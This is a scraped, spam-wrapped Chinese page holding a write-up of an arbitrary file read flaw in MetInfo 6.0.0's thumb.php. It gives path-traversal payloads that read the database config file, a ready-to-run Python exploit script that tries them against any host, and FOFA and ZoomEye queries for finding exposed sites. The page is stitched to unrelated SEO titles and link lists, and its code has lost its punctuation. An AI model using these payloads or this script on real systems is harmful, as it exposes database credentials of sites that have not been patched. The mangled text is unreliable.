当前位置: 首页 > news >正文

合肥网站建设的公司新闻类网站如何做量化统计

合肥网站建设的公司,新闻类网站如何做量化统计,免费行情软件app一个,网站销售好做吗文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称#xff1a;MetInfo任意文件读取 漏洞简介#xff1a;MetInfo是一套使用PHP和MySQL开发的内容管理系统#xff0c;其… 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称MetInfo任意文件读取 漏洞简介MetInfo是一套使用PHP和MySQL开发的内容管理系统其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞攻击者可利用该漏洞读取网站的敏感文件。 下载地址历史版本安装文件下载 Ver_6.0.0 1.2、漏洞等级 高危 1.3、影响版本 影响版本MetInfo 6.0.0 1.4、漏洞复现 代码审计 defined(IN_MET) or exit(No permission);load::sys_class(web);class old_thumb extends web{public function doshow(){global $_M;$dir str_replace(array(../,./), , $_GET[dir]);if(substr(str_replace($_M[url][site], , $dir),0,4) http strpos($dir, ./) false){header(Content-type: image/jpeg);ob_start();readfile($dir);ob_flush();flush();die;}$dir str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]); dir变量接受来自$_GET[‘dir’]传递进来的值用了str_replace函数做替换将.././替换成空值 readfile($dir); 漏洞点 /include/thumb.php使用bp进行抓包 测试一 /include/thumb.php?dir..././http/..././config/config_db.php测试二 /include/thumb.php?dir.....///http/.....///config/config_db.php测试三 /include/thumb.php?dirhttp/.....///.....///config/config_db.php测试四 /include/thumb.php?dirhttp\..\..\config\config_db.php# 此POC 仅适用于Windows 系统Linux 下无效 # 只有windows以右斜杠作为文件路径分隔符1.5、深度利用 EXP编写 import requests import sysbanner MetInfo 6.0.0___________.__.__ __________ .___\_ _____/|__| | ____ \______ \ ____ _____ __| _/| __) | | | _/ __ \ | _// __ \\__ \ / __ | | \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ | \___ / |__|____/\___ |____|_ /\___ ____ /\____ | \/ \/ \/ \/ \/ \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/ headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 }dir_list [..././http/..././config/config_db.php,.....///http/.....///config/config_db.php,http/.....///.....///config/config_db.php,http\..\..\config\config_db.php ]def attack(host):vul /include/thumb.phpurl host vulres requests.get(url url, headers headers)if res.status_code ! 200:print(f[INFO] {vul} is Not Exists!)exit()print(f[INFO] {vul} is Exists!)for param in dir_list:params {dir: param }res requests.get(url url, params params, headers headers)print(f[INFO] Test URL: {res.url})if ?php in res.text:print([RESULT] The target is vulnreable!)print(f[RESULT]\n{res.text})breakif len(sys.argv) 2:print(banner)exit()host sys.argv[1]attack(host host)1.6、漏洞挖掘 FOFA appmetinfoZoomEye app:MetInfo app:MetInfoos:Windows1.7修复建议 升级打补丁上设备
http://www.pierceye.com/news/710609/

相关文章:

  • 深圳网站建设799元起全包域名企业网站分为哪四类
  • 潍坊网站建设公司商城网站建设建站系统
  • 苏州区网站建设网站前台乱码
  • 网站设计公司企业邮箱青岛网站制作工具
  • 网站建设 html5wordpress 关注公众号
  • 自建公司网站利用网站文件下载做推广
  • 酒店网站素材软件开发合同范本大全
  • 安康市住房和城乡建设局网站网站建设广告宣传素材
  • 没有网站怎么做链接视频网上哪里给公司做网站
  • 广告网站制作报价网站开发环境怎么写
  • 网站开发总结与收获智慧团建登录官网
  • 旅游电子商务网站的建设建设局网站项目负责人资质要求
  • 设计响应式网站多少钱网站建设行业新闻动态
  • 一般做外单的有哪些网站太原市网站制作公司
  • wordpress 文章内seo代码优化工具
  • 做网站用的笔记本配置网络科技公司骗术
  • 在线建设网站江苏中南建设集团网站是多少
  • 中国建设银行官网站陕西西安网站建设域名怎么用
  • 佛山高端网站制作公司自己做的网站怎么发布到百度
  • 网站建设空间选择的重要性wordpress菲插件关键词
  • 基于wap的企业网站设计与实现洛阳霞光seo网络公司
  • 在家做的手工活哪里有网站网站开发与运营方向和企业管理方向
  • 厦门网站建设厦门南京宣传片公司有哪些
  • 专门做问卷的网站南宁做网站公司
  • 鹰潭做网站公司网站模板及素材
  • dw网站引导页怎么做wordpress 福利
  • PS网站设计网站每年都要备案吗
  • 建设通网站账号erp实施顾问
  • 变装小说 wordpress网站建设好怎么优化
  • 苏州网站建设制作开发公司江浦做网站